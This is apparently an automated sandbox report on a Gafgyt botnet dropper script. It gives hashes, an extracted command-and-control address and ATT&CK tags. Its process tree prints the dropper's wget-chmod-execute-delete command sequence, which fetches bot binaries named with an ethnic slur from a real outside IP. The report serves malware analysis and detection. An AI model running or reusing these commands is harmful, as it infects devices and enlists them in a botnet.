Analysis
-
max time kernel
3s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
06/03/2025, 04:36
Static task
static1
Behavioral task
behavioral1
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
-
Size
1KB
-
MD5
a23e61b3d2822d367944ad0bb171348e
-
SHA1
024cfb180037b542aaad41dd8330f0d797d34bc3
-
SHA256
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b
-
SHA512
ebc46985695c7fce429f8f4a30fc51f151724ef9114a172c240433d1baf85c49e81f505eb54039de0f835ee57a387b04cf2bd7f43ff02fc75336837bf093ce5b
Malware Config
Extracted
gafgyt
45.148.10.136:666
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1529 chmod 1534 chmod 1542 chmod 1505 chmod 1510 chmod 1547 chmod 1552 chmod 1557 chmod 1486 chmod 1500 chmod 1517 chmod 1522 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/jew.mips 1487 930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh -
Changes its process name 3 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1511 jew.x86 Changes the process name, possibly in an attempt to hide itself 1523 930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh Changes the process name, possibly in an attempt to hide itself 1535 930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1482 wget 1487 jew.mips 1489 rm -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.x32 wget File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.i586 wget File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.arm4 wget
Processes
-
/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh1⤵
- Executes dropped EXE
- Changes its process name
PID:1481 -
/usr/bin/wgetwget http://45.148.10.136/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1482
-
-
/bin/chmodchmod +x jew.mips2⤵
- File and Directory Permissions Modification
PID:1486
-
-
/tmp/jew.mips./jew.mips2⤵
- System Network Configuration Discovery
PID:1487
-
-
/bin/rmrm -rf jew.mips2⤵
- System Network Configuration Discovery
PID:1489
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.mpsl2⤵
- Writes file to tmp directory
PID:1490
-
-
/bin/chmodchmod +x jew.mpsl2⤵
- File and Directory Permissions Modification
PID:1500
-
-
/tmp/jew.mpsl./jew.mpsl2⤵PID:1501
-
-
/bin/rmrm -rf jew.mpsl2⤵PID:1503
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.sh42⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/chmodchmod +x jew.sh42⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/jew.sh4./jew.sh42⤵PID:1506
-
-
/bin/rmrm -rf jew.sh42⤵PID:1508
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.x862⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/chmodchmod +x jew.x862⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/jew.x86./jew.x862⤵
- Changes its process name
PID:1511
-
-
/bin/rmrm -rf jew.x862⤵PID:1514
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm62⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/chmodchmod +x jew.arm62⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/jew.arm6./jew.arm62⤵PID:1518
-
-
/bin/rmrm -rf jew.arm62⤵PID:1520
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.x322⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/chmodchmod +x jew.x322⤵
- File and Directory Permissions Modification
PID:1522
-
-
/bin/rmrm -rf jew.x322⤵PID:1526
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.ppc2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/chmodchmod +x jew.ppc2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/jew.ppc./jew.ppc2⤵PID:1530
-
-
/bin/rmrm -rf jew.ppc2⤵PID:1532
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.i5862⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/chmodchmod +x jew.i5862⤵
- File and Directory Permissions Modification
PID:1534
-
-
/bin/rmrm -rf jew.i5862⤵PID:1538
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.m68k2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/chmodchmod +x jew.m68k2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/jew.m68k./jew.m68k2⤵PID:1543
-
-
/bin/rmrm -rf jew.m68k2⤵PID:1545
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.ppc2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/chmodchmod +x jew.ppc2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/jew.ppc./jew.ppc2⤵PID:1548
-
-
/bin/rmrm -rf jew.ppc2⤵PID:1550
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm42⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/chmodchmod +x jew.arm42⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/jew.arm4./jew.arm42⤵PID:1553
-
-
/bin/rmrm -rf jew.arm42⤵PID:1555
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm52⤵PID:1556
-
-
/bin/chmodchmod +x jew.arm52⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/jew.arm5./jew.arm52⤵PID:1558
-
-
/bin/rmrm -rf jew.arm52⤵PID:1559
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD5a328b683ab2e102306ce558ac2848bc0
SHA18e4ca556c8ac6483a4f496736cd6efb645732d13
SHA256596c2174f15304ad6029db214b0f4b5ebb97552be7f9d9a170fe03bbc7c762c1
SHA5128452bcd476ca2f27529fbfa95ed7eb348d0448350857039d7fbf26be21df34084222790becbd00ba6875417ae7f527e9e16c2ff8b6ea4f9a1330bf8b8ddd4505